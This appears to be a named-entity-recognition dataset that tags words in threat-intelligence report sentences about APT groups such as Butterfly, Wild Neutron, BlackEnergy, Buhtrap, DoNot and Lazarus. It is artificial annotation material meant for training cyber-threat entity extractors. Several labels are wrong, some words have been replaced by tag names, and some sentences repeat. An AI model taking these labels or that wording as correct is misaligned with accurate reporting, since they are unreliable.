S-ACT +are O +Persian-language O +speakers O +, O +due O +to O +the O +naming O +of O +files O +and O +folders O +in O +Persian O +. O + +For O +the O +sake O +of O +narrative O +we O +are O +going O +to O +focus O +exclusively O +to O +those O +samples O +we O +identified O +being O +used O +in O +attacks O +against O +Iranian S-LOC +civil B-IDTY +society E-IDTY +and O +diaspora S-IDTY +. O + +Butterfly S-APT +has O +attacked O +multi-billion B-IDTY +dollar I-IDTY +companies E-IDTY +operating O +in O +the O +internet O +, O +IT O +software O +, O +pharmaceutical S-IDTY +, O +and O +commodities B-IDTY +sectors E-IDTY +. 
O + +The O +first O +signs O +of O +Butterfly O +'s O +activities S-ACT +emerged O +in O +early B-TIME +2013 E-TIME +when O +several O +major O +technology S-IDTY +and O +internet B-IDTY +firms E-IDTY +were O +compromised O +. O + +However O +, O +an O +investigation O +by O +Symantec S-SECTEAM +has O +found O +that O +the O +group O +has O +been O +active O +since O +at O +least O +March S-TIME +2012 S-TIME +and O +its O +attacks O +have O +not O +only O +continued O +to O +the O +present O +day O +, O +but O +have O +also O +increased O +in O +number O +. O + +Symantec S-SECTEAM +has O +to O +date O +discovered O +49 O +different O +organizations O +in O +more O +than O +20 O +countries O +that O +have O +been O +attacked O +by O +Butterfly O +. O + +Aside O +from O +the O +four O +companies O +which O +have O +publicly O +acknowledged O +attacks O +, O +Symantec S-SECTEAM +has O +identified O +five O +other O +large O +technology B-IDTY +firms E-IDTY +compromised O +by O +Butterfly O +, O +primarily O +headquartered O +in O +the O +US S-LOC +. O + +In O +the O +first O +attack O +, O +Butterfly O +gained O +a O +foothold O +by O +first O +attacking O +a O +small O +European O +office O +belonging O +to O +one O +firm O +and O +using O +this O +infection O +to O +then O +move O +on O +to O +its O +US O +office O +and O +European S-LOC +headquarters O +. O + +However O +, O +technology S-IDTY +is O +not O +the O +only O +sector O +the O +group O +has O +focused O +on O +and O +Symantec S-SECTEAM +has O +found O +evidence O +that O +Butterfly O +has O +attacked O +three O +major O +European O +pharmaceutical B-IDTY +firms E-IDTY +. O + +Butterfly S-APT +has O +also O +shown O +an O +interest O +in O +the O +commodities B-IDTY +sector E-IDTY +, O +attacking O +two O +major O +companies O +involved O +in O +gold S-IDTY +and O +oil S-IDTY +in O +late O +2014 S-TIME +. 
O + +The O +company O +specializes O +in O +finance S-IDTY +and O +natural O +resources O +specific O +to O +that O +region O +. O + +The O +latter O +was O +one O +of O +at O +least O +three O +law B-IDTY +firms E-IDTY +Butterfly S-APT +has O +targeted O +over O +the O +past O +three O +years O +. O + +In O +many O +attacks O +, O +the O +group O +has O +succeeded O +in O +compromising O +Microsoft B-MAL +Exchange E-MAL +or O +Lotus B-MAL +Domino I-MAL +email I-MAL +servers E-MAL +in O +order O +to O +intercept O +company O +emails S-TOOL +and O +possibly O +use O +them O +to O +send O +counterfeit O +emails S-TOOL +. O + +A O +powerful O +threat O +actor O +known O +as O +" O +Wild O +Neutron O +" O +( O +also O +known O +as O +" O +Jripbot S-APT +" O +and O +" O +Morpho S-APT +" O +) O +has O +been O +active O +since O +at O +least O +2011 S-TIME +, O +infecting O +high B-IDTY +profile I-IDTY +companies E-IDTY +for O +several O +years O +by O +using O +a O +combination O +of O +exploits O +, O +watering B-ACT +holes E-ACT +and O +multi-platform O +malware O +. O + +Based O +on O +the O +profile O +of O +the O +victims O +and O +the O +type O +of O +information O +targeted O +by O +the O +attackers O +, O +Symantec S-SECTEAM +believes O +that O +Butterfly O +is O +financially O +motivated O +, O +stealing O +information O +it O +can O +potentially O +profit O +from O +. O + +Wild O +Neutron O +hit O +the O +spotlight O +in O +2013 S-TIME +, O +when O +it O +successfully O +infected O +companies O +such O +as O +Apple S-IDTY +, O +Facebook S-IDTY +, O +Twitter S-IDTY +and O +Microsoft S-IDTY +. O + +Wild B-APT +Neutron E-APT +'s O +attacks O +in O +2015 S-TIME +uses O +a O +stolen B-MAL +code I-MAL +signing I-MAL +certificate E-MAL +belonging O +to O +Taiwanese S-LOC +electronics S-IDTY +maker O +Acer O +and O +an O +unknown O +Flash B-TOOL +Player E-TOOL +exploit S-VULNAME +. 
O + +During O +the O +2013 B-ACT +attacks E-ACT +, O +the O +Wild O +Neutron O +actor O +successfully O +compromised O +and O +leveraged O +the O +website O +www.iphonedevsdk.com O +, O +which O +is O +an O +iPhone O +developers O +forum O +. O + +Wild B-APT +Neutron E-APT +'s O +attack O +took O +advantage O +of O +a O +Java S-TOOL +zero-day S-VULNAME +exploit S-VULNAME +and O +used O +hacked O +forums O +as O +watering B-ACT +holes E-ACT +. O + +While O +the O +group O +used O +watering B-ACT +hole I-ACT +attacks E-ACT +in O +2013 S-TIME +, O +it's O +still O +unclear O +how O +victims O +get O +redirected O +to O +the O +exploitation O +kits O +in O +the O +new O +2014-2015 B-ACT +attacks E-ACT +. O + +Wild B-APT +Neutron E-APT +'s O +tools O +include O +a O +password B-MAL +harvesting I-MAL +trojan E-MAL +, O +a O +reverse-shell B-MAL +backdoor E-MAL +and O +customized B-MAL +implementations I-MAL +of I-MAL +OpenSSH E-MAL +, O +WMIC S-MAL +and O +SMB S-MAL +. O + +Instead O +of O +Flash S-TOOL +exploits S-VULNAME +, O +older O +Wild O +Neutron O +exploitation O +and O +watering B-ACT +holes E-ACT +used O +what O +was O +a O +Java S-TOOL +zero-day S-VULNAME +at O +the O +end B-TIME +of I-TIME +2012 E-TIME +and O +the O +beginning B-TIME +of I-TIME +2013 E-TIME +, O +detected O +by O +Kaspersky B-SECTEAM +Lab E-SECTEAM +products O +as O +Exploit.Java.CVE-2012-3213.b S-VULID +. O + +The O +victims O +for O +the O +2014-2015 S-TIME +versions O +are O +generally O +IT S-IDTY +and O +real B-IDTY +estate/investment I-IDTY +companies E-IDTY +and O +in O +both O +cases O +, O +a O +small O +number O +of O +computers O +have O +been O +infected O +throughout O +Wild B-APT +Neutron E-APT +. 
O + +Wild B-APT +Neutron E-APT +'s O +targeting O +of O +major O +IT B-IDTY +companies E-IDTY +, O +spyware B-IDTY +developers E-IDTY +( O +FlexiSPY S-IDTY +) O +, O +jihadist B-IDTY +forums E-IDTY +( O +the O +" O +Ansar B-IDTY +Al-Mujahideen I-IDTY +English I-IDTY +Forum E-IDTY +" O +) O +and O +Bitcoin B-IDTY +companies E-IDTY +indicate O +a O +flexible O +yet O +unusual O +mindset O +and O +interests O +. O + +We O +continue O +to O +track O +the O +Wild B-APT +Neutron I-APT +group E-APT +, O +which O +is O +still O +active O +as O +of O +June B-TIME +2015 E-TIME +. O + +A O +ransomware O +variant O +dubbed O +PyLocky S-MAL +was O +observed O +in O +September B-TIME +2018 E-TIME +being O +distributed O +by O +a O +phishing B-ACT +campaign E-ACT +using O +an O +invoicing O +theme O +. O + +PyLocky S-MAL +was O +found O +to O +be O +targeting O +entities O +in O +France S-LOC +and O +Germany S-LOC +. O + +Fxmsp S-APT +specialize O +in O +breaching O +highly O +secure O +protected O +networks O +to O +access O +private O +corporate O +and O +government O +information O +. O + +Fxmsp S-APT +is O +a O +hacking O +collective O +that O +has O +operated O +in O +various O +top-tier O +Russian- O +and O +English-speaking O +underground O +communities O +since O +2017 S-TIME +. O + +Throughout O +2017 S-TIME +and O +2018 S-TIME +, O +Fxmsp S-APT +established O +a O +network O +of O +trusted O +proxy O +resellers O +to O +promote O +their O +breaches O +on O +the O +criminal O +underground O +. O + +On O +April B-TIME +24 E-TIME +, O +2019 S-TIME +, O +Fxmsp S-APT +claimed O +to O +have O +secured O +access O +to O +three O +leading O +antivirus B-IDTY +companies E-IDTY +. O + +According O +to O +the O +Fxmsp O +, O +they O +worked O +tirelessly O +for O +the O +first O +quarter O +of O +2019 S-TIME +to O +breach O +these O +companies O +and O +finally O +succeeded O +and O +obtained O +access O +to O +the O +companies' O +internal O +networks O +. 
O + +Booz B-SECTEAM +Allen I-SECTEAM +Hamilton E-SECTEAM +in O +2014 S-TIME +and O +AhnLab S-SECTEAM +in O +2015 S-TIME +reported O +on O +Bisonal O +using O +a O +simple O +XOR O +cipher O +to O +hide O +the O +C2 S-TOOL +address O +strings O +in O +the O +body O +. O +For O +example O +, O +Bisonal B-APT +malware E-APT +in O +2012 S-TIME +used O +send() O +and O +recv() O +APIs O +to O +communicate O +with O +its O +C2. O +This O +Bisonal S-FILE +variant O +used O +in O +the O +latest O +attack O +communicates O +with O +one O +of O +the O +following O +hard-coded O +C2 S-TOOL +addresses O +by O +using O +the O +HTTP B-ACT +POST E-ACT +method O +on O +TCP S-PROT +PROT O +443 O +. O +Previous O +reports O +have O +discussed O +Bisonal B-FILE +malware E-FILE +used O +in O +attacks O +against O +Japan S-LOC +, O +South B-LOC +Korea E-LOC +and O +Russia S-LOC +. O +This O +particular O +sample S-FILE +we O +found O +targeted O +an O +organization O +in O +Russia S-LOC +and O +there O +is O +a O +specific O +system O +language O +check O +for O +Cyrillic O +and O +no O +others O +. O +If O +it's S-FILE +Cyrillic S-MAL +and O +the O +command O +to O +the O +shell O +is O +not O +‘ipconfig’ O +, O +the O +threat O +converts O +the O +command O +result O +text O +encoding O +from O +Cyrillic O +to O +UTF-16 S-MAL +. O +Similar O +to O +the O +Bisonal S-FILE +variant O +targeting O +the O +Russian B-LOC +organization E-LOC +, O +this O +sample O +was O +also O +disguised O +as O +PDF S-TOOL +document O +. O + +The O +installed B-FILE +EXE I-FILE +file E-FILE +is O +almost O +exactly O +the O +same O +as O +the O +DLL S-TOOL +version O +of O +Bisonal B-FILE +variant E-FILE +used O +against O +the O +Russian S-LOC +organization O +. 
O +The O +targets O +are O +military O +or O +defense O +industry O +in O +particular B-LOC +countries E-LOC +, O +it O +used O +DDNS S-PROT +for O +C2 S-TOOL +servers O +, O +and O +tracked O +connections O +from O +their O +victims O +by O +using O +target O +or O +campaign O +codes O +, O +as O +well O +as O +disguising O +the O +malware S-ACT +as O +document O +file O +, O +and O +using O +a O +dropper S-MAL +to O +install O +the O +malware O +and O +decoy O +file O +. O +A O +previous O +campaign O +of O +this O +APT O +group O +was O +uncovered O +by O +Talos S-SECTEAM +in O +June B-TIME +2017 E-TIME +, O +and O +since O +then O +very O +little O +of O +this O +operation O +was O +seen O +in O +the O +wild O +. O +ined O +in O +the O +archive O +is O +called O +DriverInstallerU.exe” S-FILE +but O +its O +metadata O +shows O +that O +its O +original O +name O +is O +Interenet B-FILE +Assistant.exe” E-FILE +. O +After O +reviewing O +all O +the O +malware O +functionalities O +, O +we O +are O +confident O +in O +saying O +that O +the O +attackers S-APT +look O +for O +victims B-IDTY +who I-IDTY +answer E-IDTY +well-defined O +characteristics O +and O +believe O +that O +further O +stages O +of O +the O +attack O +are O +delivered O +only O +to O +those O +who O +fit O +the O +specific O +victim O +profile O +. O +In O +this O +sample O +, O +however O +, O +the O +module O +names O +were O +changed O +from O +actors O +and O +characters’ O +names O +to O +car O +models O +, O +namely O +BMW_x1” S-FILE +, O +BMW_x2” S-FILE +and O +up O +to O +BMW_x8” S-FILE +. O +But O +, O +thanks O +to O +the O +attackers S-APT +known O +affection O +for O +decoy O +documents O +that O +pose O +as O +news O +summaries O +, O +we O +were O +able O +to O +date O +the O +campaign O +back O +to O +March B-TIME +2018 E-TIME +. 
O +With O +the O +experience O +gained O +from O +the O +APT B-ACT +attack E-ACT +that O +began O +in O +March B-TIME +2017 E-TIME +, O +it O +seems O +this O +campaign O +has O +evolved O +into O +an O +attack O +with O +new O +capabilities O +, O +and O +an O +even O +more O +specific O +target O +, O +over O +a O +year O +later O +. O +These O +unknown B-APT +actors E-APT +continued O +launching O +DDoS S-ACT +attacks O +over O +the O +next O +few O +years O +. O +For O +simplicity O +, O +Kaspersky S-SECTEAM +is O +calling O +them O +the O +BlackEnergy E-APT +APT O +group O +. O +Since O +the O +middle B-TIME +of I-TIME +2015 E-TIME +, O +one O +of O +the O +preferred O +attack O +vectors O +for O +BlackEnergy S-APT +in O +Ukraine S-LOC +has O +been O +Excel O +documents O +with O +macros O +that O +drop O +the O +Trojan S-MAL +to O +disk O +if O +the O +user O +chooses O +to O +run O +the O +script O +in O +the O +document O +. O +A O +very O +good O +analysis O +and O +overview O +of O +the O +BlackEnergy O +attacks O +in O +Ukraine O +throughout O +2014 S-TIME +and O +2015 S-TIME +was O +published O +by O +the O +Ukrainian O +security O +firm O +Cys B-SECTEAM +Centrum E-SECTEAM +the O +text O +is O +only O +available O +in O +Russian O +for O +now O +, O +but O +can O +be O +read O +via O +Google O +Translate O +. O +The O +earliest O +signs O +of O +destructive B-ACT +payloads E-ACT +with O +BlackEnergy S-APT +go O +back O +as O +far O +as O +June B-TIME +2014 E-TIME +. O +BlackEnergy S-APT +is O +a O +highly O +dynamic O +threat O +actor O +and O +the O +current O +attacks O +in O +Ukraine S-LOC +indicate O +that O +destructive O +actions O +are O +on O +their O +main O +agenda O +, O +in O +addition O +to O +compromising O +industrial O +control O +installations O +and O +espionage O +activities O +. 
O +Kaspersky S-SECTEAM +will O +continue O +to O +monitor O +the O +BlackEnergy S-APT +attacks O +in O +Ukraine S-LOC +and O +update O +our O +readers O +with O +more O +data O +when O +available O +. O +From O +Buhtrap S-APT +perpetrating O +cybercrime O +for O +financial O +gain O +, O +its O +toolset O +has O +been O +expanded O +with O +malware O +used O +to O +conduct O +espionage O +in O +Eastern B-LOC +Europe E-LOC +and O +Central B-LOC +Asia E-LOC +. O +Throughout O +our O +tracking O +, O +we've S-SECTEAM +seen O +this B-APT +group E-APT +deploy O +its O +main O +backdoor S-ACT +as O +well O +as O +other O +tools O +against O +various O +victims O +, O +but O +June B-TIME +2019 E-TIME +was O +the O +first O +time O +we O +saw O +the O +Buhtrap S-APT +group O +use O +a O +zero-day B-ACT +exploit E-ACT +as O +part O +of O +a O +campaign O +. O +In O +that O +case O +, O +we O +observed O +Buhtrap S-APT +using O +a O +local O +privilege O +escalation O +exploit S-VULNAME +, O +CVE-2019-1132 S-VULID +, O +against O +one O +of O +its O +victims O +. O +However O +, O +as O +the O +shift O +in O +targets O +occurred O +before O +the O +source O +code O +leak O +, O +we O +assess O +with O +high O +confidence O +that O +the O +same O +people O +behind O +the O +first O +Buhtrap S-APT +malware O +attacks O +against O +businesses S-IDTY +and O +banks S-IDTY +are O +also O +involved O +in O +targeting O +governmental B-IDTY +institutions E-IDTY +. O +When O +Buhtrap S-APT +was O +targeting O +businesses S-IDTY +, O +the O +decoy O +documents O +would O +typically O +be O +contracts O +or O +invoices O +. O +The O +Buhtrap S-APT +group O +is O +well O +known O +for O +its O +targeting O +of O +financial B-IDTY +institutions E-IDTY +and O +businesses O +in O +Russia S-LOC +. O +Figure O +2 O +is O +a O +typical O +example O +of O +a O +generic O +invoice O +the O +group O +used O +in O +a O +campaign O +in O +2014 S-TIME +. 
O +When O +the O +group's S-APT +focus O +shifted O +to O +banks O +, O +the O +decoy O +documents O +were O +related O +to O +banking O +system O +regulations O +or O +advisories O +from O +FinCERT S-SECTEAM +, O +an O +organization O +created O +by O +the O +Russian O +government O +to O +provide O +help O +and O +guidance O +to O +its O +financial O +institutions O +. O +We O +confirmed O +that O +this O +is O +a O +DarkHydrus S-APT +Group's O +new O +attack O +targeting O +Middle B-LOC +East I-LOC +region E-LOC +. O +In O +July O +2018 S-TIME +, O +Palo B-SECTEAM +Alto E-SECTEAM +disclosed O +DarkHydrus S-APT +Group O +which O +showed O +its O +special O +interest O +to O +governments S-IDTY +in O +Middle B-LOC +East E-LOC +. O +Prior O +to O +that O +report O +, O +we O +published O +detail O +analysis O +on O +malware O +exploiting O +CVE-2018-8414 S-VULID +vulnerability O +(remote O +code O +execution O +in O +SettingContent-ms) O +, O +which O +is O +believed O +a O +work O +of O +DarkHydrus S-APT +. O +However O +, O +the O +final O +payload O +is O +something O +that O +welivesecurity S-SECTEAM +have O +never O +seen O +associated O +with O +Buhtrap S-APT +. O +It's O +coincident O +that O +both O +'darkhydrus' S-APT +APT O +group O +name O +and O +‘Williams’ S-APT +user O +name O +in O +PDB O +path O +found O +in O +this O +Twitter B-IDTY +user E-IDTY +. O +In O +recent O +APT O +incidents O +, O +Dark B-APT +Hydruns E-APT +tend O +to O +adopt O +Office B-MAL +VBA I-MAL +macro E-MAL +instead O +of O +Office O +0day O +vulnerability O +in O +the O +consideration O +of O +cost O +reduction O +. O +ASERT S-SECTEAM +uncovered O +a O +credential O +theft O +campaign O +we O +call O +LUCKY B-APT +ELEPHANT E-APT +where O +attackers B-ACT +masquerade E-ACT +as O +legitimate O +entities O +such O +as O +foreign B-IDTY +government E-IDTY +, O +telecommunications S-IDTY +, O +and O +military S-IDTY +. 
O +From O +at O +least O +February B-TIME +2019 E-TIME +to O +present O +, O +the O +actors O +in O +the O +LUCKY B-APT +ELEPHANT E-APT +campaign O +copied O +webpages O +to O +mimic O +South B-IDTY +Asian I-IDTY +government I-IDTY +websites E-IDTY +as O +well O +as O +Microsoft B-IDTY +Outlook E-IDTY +365 O +login O +pages O +and O +hosted B-ACT +them E-ACT +on O +their O +own O +doppelganger O +domains O +, O +presumably O +to O +trick O +victims O +into O +providing O +login O +credentials O +. O +ASERT S-SECTEAM +suspects O +that O +the O +Actors O +use O +phishing B-ACT +emails S-TOOL +to O +lure O +victims O +to O +the O +doppelganger O +websites O +and O +entice O +users O +to O +enter O +their O +credentials O +. O +It O +is O +important O +to O +note O +that O +one O +domain O +, O +yahoomail[.]cf O +is O +only O +associated O +with O +this O +group O +from O +February B-TIME +2019 E-TIME +onward O +. O +In O +late O +2018 S-TIME +, O +the O +domain O +was O +associated O +with O +a O +different O +APT O +group O +/ O +campaign O +of O +Chinese B-LOC +origin E-LOC +. O +Based O +on O +our O +analysis O +into O +the O +activity O +, O +ASERT O +deems O +with O +moderate O +confidence O +that O +an O +Indian B-APT +APT I-APT +group E-APT +is O +behind O +the O +LUCKY B-ACT +ELEPHANT I-ACT +campaign E-ACT +. O +The O +targets O +are O +typical O +of O +known O +Indian S-LOC +APT O +activity O +and O +the O +infrastructure O +was O +previously O +used O +by O +an O +Indian O +APT O +group O +. O +DoNot B-APT +Team E-APT +has O +a O +history O +of O +heavily O +targeting O +Pakistan S-LOC +, O +in O +addition O +to O +other O +neighboring B-LOC +countries E-LOC +. O +The O +360 O +Intelligence O +Center O +observed O +four O +distinct O +campaigns O +against O +Pakistan S-LOC +since O +2017 O +(link) O +, O +recently O +targeting O +Pakistani B-IDTY +businessmen E-IDTY +working O +in O +China O +. 
O +DoNot S-APT +Team’s O +confirmed O +use O +of O +this O +IP S-PROT +dates O +back O +to O +September B-TIME +2018 E-TIME +, O +with O +a O +six-month S-TIME +gap O +until O +it O +was O +used O +to O +host O +doppelganger O +domains O +for O +the O +LUCKY B-ACT +ELEPHANT E-ACT +campaign O +in O +early O +February S-TIME +. O + +One O +of O +the O +IP S-PROT +addresses O +, O +128.127.105.13 S-IP +, O +was O +previously O +used O +by O +the O +DoNot B-APT +Team E-APT +(aka O +APT-C-35 S-APT +) O +, O +a O +suspected O +Indian S-LOC +APT O +group O +. O + +The O +actors O +behind O +LUCKY B-APT +ELEPHANT E-APT +recognize O +the O +effectiveness O +and O +use O +doppelganger B-MAL +webpages E-MAL +nearly O +identical O +to O +legitimate O +sites O +, O +enticing O +users O +to O +input O +their O +credentials O +. O +The O +heavier O +targeting O +in O +Pakistan O +adheres O +to O +historical O +targeting O +and O +the O +ongoing O +tension O +between O +the O +two O +countries O +, O +which O +has O +escalated O +since O +a O +terrorist B-ACT +attack E-ACT +in O +Kashmir O +on O +14 B-TIME +February I-TIME +2019 E-TIME +. O +The O +targeting O +of O +Pakistan S-LOC +, O +Bangladesh S-LOC +, O +Sri B-LOC +Lanka E-LOC +, O +Maldives S-LOC +, O +Myanmar S-LOC +, O +Nepal S-LOC +, O +and O +the O +Shanghai B-IDTY +Cooperation I-IDTY +Organization E-IDTY +are O +all O +historical O +espionage S-ACT +targets O +by O +India S-LOC +. O +However O +, O +it O +is O +clear O +is O +that O +Donot S-APT +are O +actively O +establishing O +infrastructure O +and O +are O +targeting O +governments O +in O +South B-LOC +Asia E-LOC +. O +First B-ACT +attack E-ACT +of O +this O +campaign O +took O +place O +in O +May B-TIME +2018 E-TIME +. O +Arbor S-SECTEAM +also O +published O +APT O +research O +on O +this O +group O +, O +and O +named O +it O +‘Donot’ S-APT +. O +Donot S-APT +attacked O +government B-IDTY +agencies E-IDTY +, O +aiming O +for O +classified O +intelligence O +. 
O +We O +identified O +this O +APT O +group O +coded O +as O +‘APT-C-35’ S-APT +in O +2017 O +, O +who O +is O +mainly O +targeting O +Pakistan S-LOC +and O +other O +South B-LOC +Asian E-LOC +countries O +for O +Cyber B-ACT +Espionage E-ACT +. O +At O +least O +4 O +attack O +campaigns O +against O +Pakistan O +have O +been O +observed O +by O +us O +since B-TIME +2017 E-TIME +. O +Spear B-MAL +phishing E-MAL +emails S-TOOL +with O +vulnerable O +Office O +documents O +or O +malicious O +macros O +are O +sent O +to O +victims O +. O +In O +the O +latest O +attack O +, O +Donot B-APT +group E-APT +is O +targeting O +Pakistani B-IDTY +businessman E-IDTY +working O +in O +China S-LOC +. O +Two O +unique O +malware O +frameworks O +, O +EHDevel S-MAL +and O +yty S-MAL +, O +are O +developed O +by O +attackers S-APT +. O +wuaupdt.exe S-FILE +is O +a O +CMD B-MAL +backdoor E-MAL +, O +which O +can O +receive O +and O +execute O +CMD O +commands O +sent O +from O +C2 S-TOOL +. O +Furthermore O +, O +it O +has O +similar O +code O +logic O +as O +previous O +ones O +wuaupdt.exe S-FILE +in O +this O +attack O +appears O +in O +previous O +Donot O +attack O +, O +and O +C2 S-TOOL +addresses O +are O +same O +to O +previous O +ones O +. O +From O +the O +attack O +activity O +captured O +this O +time O +, O +it O +is O +obvious O +that O +Donot B-APT +APT I-APT +group E-APT +is O +still O +keen O +on O +Pakistan S-LOC +as O +primary O +target O +of O +attack O +, O +and O +even O +expands O +scope O +of O +attack O +to O +include O +Pakistani O +staffs O +and O +institutions O +in O +China S-LOC +. O +Buhtrap S-APT +still O +make O +extensive O +use O +of O +NSIS B-APT +installers E-APT +as O +droppers O +and O +these O +are O +mainly O +delivered O +through O +malicious O +documents O +. 
O +They O +first O +came O +to O +light O +in O +2016 S-TIME +, O +when O +they O +managed O +to O +steal O +sensitive O +information O +from O +the O +US O +Democratic O +National O +Committee O +(DNC) S-IDTY +. O +Earworm S-APT +first O +came O +to O +light O +in O +2016 S-TIME +, O +when O +they O +managed O +to O +steal O +sensitive O +information O +from O +the O +US O +Democratic O +National O +Committee O +(DNC) S-IDTY +. O +They S-APT +were O +also O +behind O +an O +attack O +on O +the O +World O +Anti-Doping O +Agency O +(WADA) S-IDTY +, O +in O +which O +they O +leaked O +confidential O +information O +about O +several O +drug O +tests O +. O +SPLM S-APT +, O +GAMEFISH S-APT +, O +and O +Zebrocy S-APT +delivery O +all O +maintain O +their O +own O +clusters O +, O +but O +frequently O +overlap O +later O +. O +Our O +previous O +post O +on O +Sofacy's S-APT +2017 O +activity O +stepped O +aACT O +from O +the O +previously O +covered O +headline O +buzz O +presenting O +their O +association O +with O +previously O +known O +political O +hacks O +and O +interest O +in O +Europe S-LOC +and O +the O +US S-LOC +, O +and O +examines O +their O +under-reported O +ongoing O +activity O +in O +middle B-LOC +east E-LOC +, O +central B-LOC +asia E-LOC +, O +and O +now O +a O +shift O +in O +targeting O +further O +east O +, O +including O +China S-LOC +, O +along O +with O +an O +overlap O +surprise O +. O +The O +larger O +, O +300kb+ O +SPLM S-APT +backdoors O +deployed O +in O +2016 B-TIME +and I-TIME +2017 E-TIME +are O +not O +observed O +any O +longer O +at O +targets O +in O +2018 S-TIME +. 
O +A O +previous O +, O +removed O +, O +report O +from O +another O +vendor O +claimed O +non-specific O +information O +about O +the O +groups' S-APT +interest O +in O +Chinese B-IDTY +universities E-IDTY +, O +but O +that O +report O +has O +been O +removed O +– O +most O +likely O +detections O +were O +related O +to O +students’ O +and O +researchers’ O +scanning O +known O +collected O +samples O +and O +any O +incidents” O +remain O +unconfirmed O +and O +unknown O +. O +Either O +ACT O +, O +the O +group's S-APT +consistent O +activity O +throughout O +central B-LOC +and I-LOC +eastern I-LOC +asia E-LOC +seems O +to O +be O +poorly O +represented O +in O +the O +public O +discussion O +. O +The O +actors O +behind O +this O +campaign O +we O +call O +LUCKY B-APT +ELEPHANT E-APT +use O +doppelganger B-MAL +webpages E-MAL +to O +mimic O +legitimate O +entities O +such O +as O +foreign B-IDTY +governments E-IDTY +, O +telecommunications S-IDTY +, O +and O +military S-IDTY +. O +Currently O +, O +Sofacy O +targets O +large O +air-defense S-ACT +related O +commercial O +organizations O +in O +China S-LOC +with O +SPLM O +, O +and O +moves O +Zebrocy O +focus O +across O +Armenia S-LOC +, O +Turkey S-LOC +, O +Kazahkstan S-LOC +, O +Tajikistan S-LOC +, O +Afghanistan S-LOC +, O +Mongolia S-LOC +, O +China S-LOC +, O +and O +Japan S-LOC +. O +Either O +ACT O +, O +Sofacy's S-APT +consistent O +activity O +throughout O +central B-LOC +and I-LOC +eastern I-LOC +asia E-LOC +seems O +to O +be O +poorly O +represented O +in O +the O +public O +discussion O +. O +According O +to O +this O +new O +alert O +, O +Hidden B-APT +Cobra E-APT +the O +U.S. O +government’s O +code O +name O +for O +Lazarus O +has O +been O +conducting O +FASTCash S-ACT +attacks O +stealing O +money O +from O +Automated O +Teller O +Machines O +(ATMs) O +from O +banks S-IDTY +in O +Asia S-LOC +and O +Africa S-LOC +since O +at O +least O +2016 S-TIME +. 
O +Lazarus S-APT +is O +a O +very O +active O +attack O +group O +involved O +in O +both O +cyber O +crime O +and O +espionage O +. O +The O +group O +was O +initially O +known O +for O +its O +espionage O +operations O +and O +a O +number O +of O +high-profile O +disruptive O +attacks O +, O +including O +the O +2014 B-ACT +attack E-ACT +on O +Sony O +Pictures O +. O +Following O +US-CERTs O +report O +, O +Symantec's O +research O +uncovered O +the O +key O +component O +used O +in O +Lazarus's S-APT +recent O +wave O +of O +financial S-IDTY +attacks O +. O +More O +recently O +, O +Lazarus S-APT +has O +also O +become O +involved O +in O +financially O +motivated O +attacks O +, O +including O +an O +US$81 O +million O +dollar O +theft O +from O +the O +Bangladesh B-IDTY +Central I-IDTY +Bank E-IDTY +and O +the O +WannaCry S-MAL +ransomware O +. O +Other O +open O +source O +and O +semi-legitimate O +pen-testing O +tools O +like O +nbtscan S-FILE +and O +powercat S-FILE +are O +being O +used O +for O +mapping O +available O +resources O +and O +lateral O +movement O +as O +well O +. O +To O +make O +the O +fraudulent O +withdrawals O +, O +Lazarus S-APT +first O +breaches O +targeted O +banks' S-IDTY +networks O +and O +compromises O +the O +switch O +application O +servers O +handling O +ATM O +transactions O +. O +The O +operation O +, O +known O +as O +FASTCash” O +has O +enabled O +Lazarus S-APT +to O +fraudulently O +empty O +ATMs O +of O +cash O +. O +In O +order O +to O +permit O +their O +fraudulent O +withdrawals O +from O +ATMs O +, O +Lazarus S-APT +inject O +a O +malicious O +Advanced O +Interactive O +eXecutive O +(AIX) S-MAL +executable O +into O +a O +running O +, O +legitimate O +process O +on O +the O +switch O +application O +server O +of O +a O +financial O +transaction O +network O +, O +in O +this O +case O +a O +network O +handling O +ATM O +transactions O +. 
O +It O +was O +previously O +believed O +that O +the O +attackers S-APT +used O +scripts S-MAL +to O +manipulate O +legitimate O +software O +on O +the O +server O +into O +enabling O +the O +fraudulent O +activity O +. O +In O +recent B-TIME +years E-TIME +, O +Lazarus S-APT +has O +also O +become O +involved O +in O +financially S-IDTY +motivated O +attacks O +. O +This O +malware S-MAL +in O +turn O +intercepts O +fraudulent O +Lazarus S-APT +cash O +withdrawal O +requests O +and O +sends O +fake O +approval O +responses O +, O +allowing O +the O +attackers O +to O +steal O +cash O +from O +ATMs O +. O +Lazarus S-APT +was O +linked O +to O +the O +$81 O +million O +theft O +from O +the O +Bangladesh B-IDTY +central I-IDTY +bank E-IDTY +in O +2016 S-TIME +, O +along O +with O +a O +number O +of O +other O +bank O +heists O +. O +Lazarus S-APT +was O +also O +linked O +to O +the O +WannaCry B-ACT +ransomware E-ACT +outbreak O +in O +May O +2017 O +. O +WannaCry S-ACT +incorporated O +the O +leaked O +EternalBlue S-VULNAME +exploit S-VULNAME +that O +used O +two O +known O +vulnerabilities O +in O +Windows S-OS +CVE-2017-0144 S-VULID +and O +CVE-2017-0145 S-VULID +to O +turn O +the O +ransomware O +into O +a O +worm O +, O +capable O +of O +spreading O +itself O +to O +any O +unpatched O +computers O +on O +the O +victim's O +network O +and O +also O +to O +other O +vulnerable O +computers O +connected O +to O +the O +internet O +. O +Lazarus S-APT +was O +initially O +known O +for O +its O +involvement O +in O +espionage O +operations O +and O +a O +number O +of O +high-profile O +disruptive O +attacks O +, O +including O +the O +2014 S-TIME +attack O +on O +Sony O +Pictures O +that O +saw O +large O +amounts O +of O +information O +being O +stolen O +and O +computers O +wiped O +by O +malware O +. 
O +In O +short O +, O +Lazarus S-APT +continues O +to O +pose O +a O +serious O +threat O +to O +the O +financial B-IDTY +sector E-IDTY +and O +organizations O +should O +take O +all O +necessary O +steps O +to O +ensure O +that O +their O +payment O +systems O +are O +fully O +up O +to O +date O +and O +secured O +. O +As O +with O +the O +2016 S-TIME +series O +of O +virtual O +bank O +heists O +, O +including O +the O +Bangladesh O +Bank O +heist O +, O +FASTCash S-SECTEAM +illustrates O +that O +Lazarus S-APT +possesses O +an O +in-depth O +knowledge O +of O +banking O +systems O +and O +transaction O +processing O +protocols O +and O +has O +the O +expertise O +to O +leverage O +that O +knowledge O +in O +order O +to O +steal O +large O +sums O +from O +vulnerable O +banks O +. O +The O +attack S-APT +, O +which O +starts O +with O +a O +malicious O +attachment O +disguised O +as O +a O +top O +secret O +US O +document O +, O +weaponizes O +TeamViewer S-MAL +, O +the O +popular O +remote O +access O +and O +desktop O +sharing O +software O +, O +to O +gain O +full O +control 